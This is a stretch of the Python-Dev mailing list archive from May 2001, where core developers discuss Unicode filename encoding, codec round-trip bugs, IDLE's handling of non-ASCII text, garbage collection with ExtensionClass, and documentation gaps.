From tim.one at home.com  Sun May 13 21:45:40 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 15:45:40 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <E14yqvu-0008Jb-00@usw-sf-web1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>

> http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465&
>    group_id=5470
>
> Category: core (C code)
> Group: None
> >Status: Closed
> >Resolution: Accepted
> Priority: 5
> Submitted By: Mark Hammond (mhammond)
> Assigned to: Mark Hammond (mhammond)
> Summary: Allow pre-encoded strings as filenames
>
> Initial Comment:
> This patch enables most filename parameters to use pre-
> encoded strings.  On Windows, the default of "mbcs" is
> used.  On all other platforms, the default filename
> encoding is the same as the general default encoding,
> which in reality means there is no functional change.
> However, other platforms can simply plugin their own
> encodings.
> ...

Mark (or anyone else who understands all this), were doc changes included?
Can someone please add a briefer user-oriented blurb to Misc/NEWS too?


From tim.one at home.com  Sun May 13 22:54:50 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 16:54:50 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPDKBAA.tim.one@home.com>

]/F]
> as a footnote, SRE uses the same source code to generate
> both 8-bit and 16-bit versions of the match engine.  I see no
> reason why we cannot do the same for the string operations
> (PyString, PyUnicode, and strop).
>
> if anyone wants me to look into this, just say "go ahead".

go ahead

Here's another idea:  whenever we fix or extend Python's "%" formats, it
requires changes in both stringobject.c and unicodeobject.c, but they've
diverged in irritating ways that make it a fresh adventure in each.

In the early days, Python handled % formats pretty much by just building a
format string and passing that on to C's sprintf.

But as the years have gone by, and the number of buggy platforms increased,
Python has taken over more & more of it itself.  For example, it doesn't
trust sprintf to deal with justification, 0-fill or blank-fill, and needed to
grow its own from-scratch code for integer conversion in order to handle
Python longs.  In addition, it also grew a PyErr_Format() routine as yet
another layer of simulating what a safe sprintf-alike should do.  Even with
all that, we've still got platform bugs due to, e.g., platform %#x and %#o
conversion adding base markers when "they shouldn't" (according to C), or not
adding them when "they should" (according to Python).

All in all, the code would be simpler and quicker now if we left the platform
sprintf out of sprintf operations entirely <wink>.  The only thing we're not
simulating ourselves is float->string conversion.  Unfortunately, we can't do
that without also doing string->float, because platforms vary in the float
strings they can read back (e.g., if Python does float->string and produces
"Inf" for positive infinity, but uses strtod or atof to read floats back in,
it's a x-platform crapshoot whether "Inf" can be read back in).

but-in-favor-of-merging-the-code-even-without-that-ly y'rs  - tim


From tim.one at home.com  Sun May 13 23:00:32 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 17:00:32 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPDKBAA.tim.one@home.com>

[skip at pobox.com]
> I (thankfully) gave up even pretending to run Windows recently, so
> I can only make a suggestion for others who look into this problem.
> Try this:
> Change test___all__.check_all so that the except clause reads:
>
>     except ImportError, msg:
>
> then print out msg when an import fails.  You should get the actual
> module that failed to import.

Yes, that confirmed termios was the culprit.  Thanks!  Fixed by adding

import termios
del termios

in pty.py.  As the irritated comment before this new code says, this is
absurd.

since-you're-on-a-roll-how-about-fixing-test_urllib2-too<wink>-ly
    y'rs  - tim


From guido at digicool.com  Mon May 14 00:26:39 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:26:39 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200."
             <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> 
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>  
            <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> 
Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com>

> > Now, if you are using the 1.4 version of ExtensionClasses you might
> > not have the tp_flags field either (I don't know, I can't easily
> > check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> > even require recompilation to work with Python 2.1.
> 
> I'll attach a copy below of the struct as defined in
> pygtk-0.7.0-unstable-dont-use.tar.gz

Hmm...  I like that filename. :-)

> (0.6.6 does not use extension
> classes). As you can see, it does not provide tp_flags, but has a
> field of tp_xxx4 for it.

Sorry, that's what I meant.  This is guaranteed to be initialized to 0
(unless a module goes out of its way to put a value in it, in which
case they deserve what they get).

> That *should* work, except that it also has its 'methods' field where
> tp_traverse would go, and its class_flags field where tp_clear would
> go.
> 
> Now, you write
> 
> > ExtensionClasses (at least recent versions that worked with 1.5.2)
> > contain a copy of the type object up to and including the tp_flags
> > field, and the 2.1 code is careful not to use any newer fields
> > without first checking the corresponding flag bit.
> 
> In this generality, it is apparently not true: Modules/gcmodule.c has,
> in delete_garbage,
> 
> 			if ((clear = op->ob_type->tp_clear) != NULL) {
> ...
> 		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
> 		(void) traverse(PyObject_FROM_GC(gc),
> 			       (visitproc)visit_decref,
> 			       NULL);
> 
> which does not check any flags. That still shouldn't cause any
> problems, since the Gtk objects should never end up in the GC lists -
> but may be I'm missing something.

I agree with your analysis: op here is gotten from a PyGC_Head, so it
cannot be a PyExtensionClass instance, so Neil's code should be safe.
Objects never have a GC head unless they specifically request it;
PyExtensionClass certainly doesn't request a GC head.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:37:44 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:37:44 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400."
             <Pine.NXT.4.21.0105121640050.261-100000@localhost> 
References: <Pine.NXT.4.21.0105121640050.261-100000@localhost> 
Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com>

>  As I said earlier: the only advantage would be if it could simplify 
> things "under the hood" (compared to metaclasses) but could still 
> provide the same Class semantics (with maybe a "proto" declaration
> sneaking it's nose in under the tent.) 
>  But I have no immediate idea on how to do that, and it sounds like
> you're pretty far along into an implementation already. 

I don't know how to do it either, but I suspect it wouldn't be easy.

>  I guess my practical quesion, which I meant to ask before I got
> myself sidetracked into preaching prototypes is: How much of the
> existing plumbing (specifically the Don Beaudry hack) can I rely
> on in the future for the objective-C/python bridge ? 
>  With BOOST and Zope's extension classes relying on it, can I 
> assume that it's being extended rather than replaced ? 
> ( I guess I ought to take a look at the code! ) 

I'm currently not too concerned with backwards compatibility, and Jim
Fulton has proclaimed that he would prefer to get rid of
ExtensionClassess (since what I'm building goes way beyond them!), so
I'm not sure I can be motivated to support just for BOOST's sake.
There will be a replacement mechanism that will be at least as
powerful, and I'm sure that BOOST etc. can be rewritten to use the new
mechanism easily.  That's what we're planning for Zope.

> Guido: did you ever imagine back at that first workshop at NIST
> that you and Python would be where you are today ? 

No way!  I knew I was on to something, but I had no idea onto what...
I'll always hold on to the T-shirt you made.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:43:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:43:57 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200."
             <00ca01c0da68$4fc66570$e46940d5@hagrid> 
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com>  
            <00ca01c0da68$4fc66570$e46940d5@hagrid> 
Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com>

> 2.2 is to be released in october, right?  I'm sure I could shake
> out the remaining bugs in my "stackless SRE" patch until then...

Knowing you that means you'd start working on them late September. :-)

There's actually a possibility that if my types/classes stuff goes
well, Digital Creations will ask for a 2.2 release sooner (e.g. July).
This might have an experimental status, e.g. it might not be backwards
compatible, but it would be the version required by Zope 2.4.  On the
other hand, none of that may happen, or that release would be labeled
2.2b1 or something, or Zope 2.4 might come out after October.

What I'm trying to say is, please try to fix stackless SRE sooner
rather than later!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:51:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:51:17 -0500
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200."
             <200105112053.WAA15657@pandora.informatik.hu-berlin.de> 
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> 
Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com>

> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='??'
> UnicodeError: ASCII encoding error: ordinal not in range(128)

This doesn't bother me, because I don't know how to enter such
characters with my US keyboard anyway. :-) :-)

> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.

Yes, this has bitten me once.  It was very painful (I lost a few hours
worth of writing).

In other words, I agree it's a problem!

> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.

Not me -- unfortunately, there are too many alternatives to IDLE to
be able to justify working on it much.

> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

Ditto.

Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the
Python prompt, both on Linux and on Windows 98.  It prints as
'\xe4\xf6' on both systems.  What changed?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Mike.Olson at fourthought.com  Mon May 14 03:02:03 2001
From: Mike.Olson at fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 19:02:03 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>
Message-ID: <3AFF2E8B.31B9ED97@FourThought.com>

"Martin v. Loewis" wrote:
> 
> > What if we put these on the implementation, that or came up with a
> > standard interface on the node.  Then, every DOM imp that wants to be
> > compatible with xpath/xslt needs to support this interface?
> >
> >
> > node.ownerDocument.implementation.releaseNode(node)
> >
> > or
> >
> > node.py_unlink()
> 
> releaseNode sounds good to me; it is unlikely that W3C would give an
> operation that name but a different meaning. Any objections?


Should we standardize all of the python xml extensions with a py
prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
worry about a name clash.

Mike
> 
> Regards,
> Martin

-- 
Mike Olson				 Principal Consultant
mike.olson at fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From MarkH at ActiveState.com  Mon May 14 03:37:35 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 11:37:35 +1000
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>

[Tim]
> Mark (or anyone else who understands all this), were doc changes included?
> Can someone please add a briefer user-oriented blurb to Misc/NEWS too?

No problem.

Where should the "real" documentation go?  It seems maybe we need a new
sub-heading under the "6.1 - os -- Misc. OS Interface" - something like:

6.1.x - Unicode and the file system
  - general discussion.
  - Windows specific
  - Mac specific should that appear.
  - OS' with no special support (ie, "the rest")

Does that make sense?

I have made this change to Misc/NEWS.  Does this look OK (obviously once I
know what to replace "[????]" with :)

And-I-will-do-the-registry-docs-at-the-same-time ly,

Mark.

Index: NEWS
===================================================================
RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v
retrieving revision 1.166
diff -r1.166 NEWS
4a5,21
> - Some operating systems now support the concept of a default Unicode
>   encoding for file system operations.  Notably, Windows supports 'mbcs'
>   as the default.  The Macintosh will also adopt this concept in the
medium
>   term, altough the default encoding for that platform will be other than
>   'mbcs'.
>   On operating system that support non-ascii filenames, it is common for
>   functions that return filenames (such as os.listdir()) to return Python
>   string objects pre-encoded using the default file system encoding for
>   the platform.  As this encoding is likely to be different from Python's
>   default encoding, converting this name to a Unicode object before
passing
>   it back to the Operating System would result in a Unicode error, as
Python
>   would attempt to use it's default encoding (generally ASCII) rather
>   than the default encoding for the file system.
>   In general, this change simply removes surprises when working with
>   Unicode and the file system, making these operations work as
>   you expect, increasing the transparency of Unicode objects in this
context.
>   See [????] for more details, including examples.


From tim.one at home.com  Mon May 14 04:52:22 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 22:52:22 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>

[Mark Hammond]
> ...
> Where should the "real" documentation go?  It seems maybe we need a
> new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> like:
>
> 6.1.x - Unicode and the file system
>   - general discussion.
>   - Windows specific
>   - Mac specific should that appear.
>   - OS' with no special support (ie, "the rest")
>
> Does that make sense?

So far is it goes, yes.  I think the manual desperately needs a Unicode
section for other reasons, though:  from traffic on c.l.py, it's clear that
few people can figure out how to do *anything* with Unicode now unless their
first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
<wink>).  There's no overview and there are no examples.  The primary string
method doesn't even mention Unicode (here paraphrasing questions that pop
up):

    encode([encoding[,errors]])
    Return an encoded version of the string.

What does "encoded version" mean?  Is that another string?  An encoding
object of some sort?  Etc.

    Default encoding is the current default string encoding.

What's the "current default string encoding"?  How can I find out?  Can't
even guess what *type* it has (string? magic object? little integer?).  If I
don't want the default encoding, how do I specify a different one?  What are
the possible values?  Again, can't even guess the type of the object that
needs to be passed for encoding.

    errors may be given to set a different error handling scheme.
    The default for errors is 'strict', meaning that encoding
    errors raise a ValueError. Other possible values are 'ignore'
    and 'replace'.

So what do 'ignore' and 'replace' mean?

There's more left unsaid here than a single example could clarify, but
there's not even an example -- so people stare at this wholly
uncomprehending.

If they stumble into the unicode() builtin function (in a different part of
the manual, neither referencing nor referenced by the .encode() method), it's
no better:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding.

What?  Hard to even guess what the function returns.  Maybe, from the name, a
Unicode string?

    Error handling is done according to errors.

What?

    The default behavior is to decode UTF-8 in strict mode,
    meaning that encoding errors raise ValueError.

How do encoding errors arise from a function that *de*codes?

    See also the codecs module.

Which helps, but the relationship between the codecs module and the unicode()
function isn't spelled out there either.  Look up "encdoing" in the index,
and you get pointers to base64, quoted-printable and the mimetypes module,
which only confuses things more.

I don't expect you to fix this <wink>, I'm trying to get across that the
Unicode docs need work even without new gimmicks.  If Fred agrees, I'm sure
he'll think of a good place to put the new info too.

> I have made this change to Misc/NEWS.  Does this look OK
> (obviously once I know what to replace "[????]" with :)

Absolutely, and I don't even have to read it to say so <wink>:  once
*something* is checked in, we're assured it won't get dropped on the floor
come release time, and anyone who has any quibbles with it can check in
changes.  It's not like checking in a NEWS item can break the std test suite
or cause HP-UX to crash.

well-not-really-sure-about-the-latter-ly y'rs  - tim


From barry at digicool.com  Mon May 14 06:16:18 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 00:16:18 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
	<02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <15103.23570.191115.85137@anthem.wooz.org>

>>>>> "FL" == Fredrik Lundh <fredrik at pythonware.com> writes:

    FL> (is Jython using exactly the same hashing and dictionary
    FL> algorithms as CPython?  or does it work by accident also under
    FL> Jython?)

Most likely, it's pure accident.  Jython's PyDictionary uses a Java
Hashtable underneath, so you're dependent on its behavior.

-Barry


From esr at thyrsus.com  Mon May 14 07:20:17 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 01:20:17 -0400
Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com>

A user pointed out a typo in the "Curses Programming with Python" tutorial
at <http://py-howto.sourceforge.net/curses/curses.html>.  While attempting
to fix it, I discovered a few tings:

1. Somebody seems to have removed Andrew Kuchling's namne from it.  If it
   was Andrew, that's OK -- but the reference in the latest version of the
   library docs still cites him.

2. I don't seem to have the TeX source anymore.  Where can I download it?

3. Perhaps it's time to start putting howtos in the nondist part of the
   CVS tree?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Power concedes nothing without a demand. It never did, and it never will.
Find out just what people will submit to, and you have found out the exact
amount of injustice and wrong which will be imposed upon them; and these will
continue until they are resisted with either words or blows, or with both.
The limits of tyrants are prescribed by the endurance of those whom they
oppress.
	-- Frederick Douglass, August 4, 1857


From greg at cosc.canterbury.ac.nz  Mon May 14 07:36:49 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 14 May 2001 17:36:49 +1200 (NZST)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl>
Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz>

Jack Jansen <jack at oratrix.nl>:

> MacOS (<= 9) itself doesn't have chdir, because it doesn't believe
> in current directories (by design.

Well, it does have an equivalent (HSetVol). But it's not used
much by Mac software because it's usual to work with full file
specifications at all times, at least internally.


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 07:38:24 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 07:38:24 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on
	Sun, 13 May 2001 19:02:03 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com>
Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de>

> Should we standardize all of the python xml extensions with a py
> prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
> worry about a name clash.

IMO, no. The entire interface together is the Python DOM mapping. In
the unlikely event of a name clash, we could still decide to rename
the DOM function, or find some other magic (e.g. overloading on the
argument count).

Regards,
Martin


From mal at lemburg.com  Mon May 14 11:02:19 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:02:19 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>
Message-ID: <3AFF9F1B.A1CDD617@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > The "right" thing to do here, is to simply remove cp875
> > from the test for round-tripping.
> 
> I'm relieved you think so, since that's what I already did <wink>.
> 
> > It is not the only encoding which fails this test, but it's not
> > our fault: the codecs were all generated from the original codec
> > maps at the Unicode.org site.
> >
> > If their mappings are broken, we can't do much about it... other
> > than to ignore the error or remove the codec altogether.
> 
> On general principle I don't like either of those -- "in the face of
> ambiguity, refuse the temptation to guess".  It's at least surprising to see
> 
> >>> unicode("?", "cp875").encode("cp875")
> '\xfd'
> >>>
> 
> now, yes?  Would it be better if an ambiguous encoding raised an exception in
> "strict" mode?  That is, a third choice is to alert users when they're
> relying on a broken part of a mapping.

The problem is: which part would raise the exception -- the
encoder or the decoder ?

Here are some more options:

* sort the items before creating the encoding table from the
  decoding one (makes the mapping stable)

* map keys which have multiple mappings in the encoding table
  to None -- this causes their usage to raise an exception
  (undefined mapping)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Mon May 14 11:15:43 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:15:43 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
Message-ID: <3AFFA23F.248517E3@lemburg.com>

Tim Peters wrote:
> 
> [Mark Hammond]
> > ...
> > Where should the "real" documentation go?  It seems maybe we need a
> > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> > like:
> >
> > 6.1.x - Unicode and the file system
> >   - general discussion.
> >   - Windows specific
> >   - Mac specific should that appear.
> >   - OS' with no special support (ie, "the rest")
> >
> > Does that make sense?
> 
> So far is it goes, yes.  I think the manual desperately needs a Unicode
> section for other reasons, though:  from traffic on c.l.py, it's clear that
> few people can figure out how to do *anything* with Unicode now unless their
> first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
> <wink>).  There's no overview and there are no examples.  The primary string
> method doesn't even mention Unicode (here paraphrasing questions that pop
> up):
> [...]

True. The main source of documentation for Unicode still is the
proposal itself (Misc/unicode.txt). It needs some reordering
and a few examples, but does contain all the information needed
to grasp what the implementation intends and how it works.

If that's still not enough, there are numerous doc-strings in
the codecs.py module, more technical docs in the API reference 
and finally the unicodeobject.h header file itself.

Another source for documentation and examples is the i18n-sig
page on python.org.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack at oratrix.nl  Mon May 14 11:55:26 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 14 May 2001 11:55:26 +0200
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl>

I'm not too thrilled with the way the filename encoding stuff was done, with a 
global var declared in posixmodule.c which is then used by bltinmodule.c. It 
took me quite a while to figure out why my builds were failing, and how to fix 
it. And I think other minority platforms may have the same problem, so maybe 
it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an 
include file, and do the initialization in a more "common" place?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From fredrik at pythonware.com  Mon May 14 12:18:49 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Mon, 14 May 2001 12:18:49 +0200
Subject: [Python-Dev] State of curses tutorial?
References: <20010514012017.A6971@thyrsus.com>
Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff>

eric wrote:
>
> 1. Somebody seems to have removed Andrew Kuchling's namne from it.  If it
>    was Andrew, that's OK -- but the reference in the latest version of the
>    library docs still cites him.

that would be either you (who reworked the document), or andrew
(who checked in your changes).  looks like fred has already fixed it:

    Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake

    Use appropriate markup for multiple authors; LaTeX's \author is not
    additive; the second occurrance was causing the first author to be dropped.

> 2. I don't seem to have the TeX source anymore.  Where can I download it?

it's in the py-howto CVS tree:

    http://sourceforge.net/projects/py-howto

Cheers /F


From loewis at informatik.hu-berlin.de  Mon May 14 13:29:21 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:29:21 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com>
Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de>

> I have a bug report assigned to myself which indicates similar
> problems with _tkinter and Tk/Tcl. There were other problem
> reports on the German Python mailing list going in the same
> direction too.
> 
> The basic problem seems to be that Tk/Tcl applies too much
> magic to the text widget contents in order to find out the
> used encoding and this can easily cause the whole encoding
> mechanism to fail.

This is actually a different problem. In this scenario here, the user
types non-ASCII character into a text widget, then _tkinter returns a
Unicode object (IMO rightfully so). In the other problem, the Python
program puts a byte string into a text widget, the user enters some
more characters, and _tkinter returns a byte string which does not
follow any encoding.

> A Tk/Tcl expert should really look into this and fix _tkinter.c
> to aid Tk/Tcl in not mixing up the encodings (e.g. it would
> probably be a good idea to recode Python 8bit-strings into
> whatever encoding Tk/Tcl assumes as default).

Again, this is not the issue here: Both _tkinter and Tk behave
absolutely correct IMO. The question is how IDLE should deal with it.

Regards,
Martin


From loewis at informatik.hu-berlin.de  Mon May 14 13:41:26 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:41:26 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message
	from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com>
Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>

> Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

Perhaps the Tcl version? That sounds like the issue that Marc talked
about: Tk behaves differently when text is entered programmatically
(and perhaps through cut-n-paste), as compared to text entered through
the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
Solaris 8 still gives me the UnicodeError.

Regards,
Martin


From MarkH at ActiveState.com  Mon May 14 14:20:43 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 22:20:43 +1000
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKELCDMAA.MarkH@ActiveState.com>

> I'm not too thrilled with the way the filename encoding stuff was
> done, with a

My apologies.  I did try and publicise the patch as much as possible.  A
misguided attempt at a low-impact change :(  I have checked in the changes
you suggest.

Mark.


From barry at digicool.com  Mon May 14 14:54:59 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 08:54:59 -0400
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
	<3AFFA23F.248517E3@lemburg.com>
Message-ID: <15103.54691.560967.853132@anthem.wooz.org>

>>>>> "M" == M  <mal at lemburg.com> writes:

    M> True. The main source of documentation for Unicode still is the
    M> proposal itself (Misc/unicode.txt). It needs some reordering
    M> and a few examples, but does contain all the information needed
    M> to grasp what the implementation intends and how it works.

As a first step, why not PEP-ify that document, much like as has been
done with the DB-API (version 1 & 2)?  It can be an informational PEP.

-Barry


From esr at thyrsus.com  Mon May 14 17:11:57 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 11:11:57 -0400
Subject: [Python-Dev] State of curses tutorial?
In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200
References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff>
Message-ID: <20010514111157.C10920@thyrsus.com>

Fredrik Lundh <fredrik at pythonware.com>:
> it's in the py-howto CVS tree:
> 
>     http://sourceforge.net/projects/py-howto

What module is the Python-HOWTO in?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The best we can hope for concerning the people at large is that they be
properly armed."
        -- Alexander Hamilton, The Federalist Papers at 184-188


From skip at pobox.com  Mon May 14 17:54:54 2001
From: skip at pobox.com (skip at pobox.com)
Date: Mon, 14 May 2001 10:54:54 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
Message-ID: <15103.65486.61021.328424@beluga.mojam.com>

    Martin> That *should* work, except that it also has its 'methods' field
    Martin> where tp_traverse would go, and its class_flags field where
    Martin> tp_clear would go.

Okay, so I'm completed confused now.  I extended the definition of
ECTypeType to include this after the doc string slot:

      (traverseproc)0,              /* tp_traverse */
      (inquiry)0,                   /* tp_clear */
      (richcmpfunc)0,               /* rich comparisons */
      0L,                           /* weak reference enabler */

    #ifdef COUNT_ALLOCS
      /* these must be last */
      0,                            /* tp_alloc */
      0,                            /* tp_free */
      0,                            /* tp_maxalloc */
      (struct _typeobject *)0,      /* tp_next */
    #endif

When I looked at the definition of ECType, after the doc string I saw

      METHOD_CHAIN(ExtensionClass_methods)

as Martin indicated.  I can't simply insert the same zeroes at the end of
the ECType def'n as I did at the end of the ECTypeType definition.  Where
does this METHOD_CHAIN thing go?  I looked at the def'n of struct
_typeobject in Include/object.h but didn't see a slot that looked suitable.

FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
I get 

    Fatal Python error: UNREF invalid object

when I run my failing script.  This is with and without making any changes
to ECType or ECTypeType.

Skip


From sdm7g at Virginia.EDU  Mon May 14 19:04:56 2001
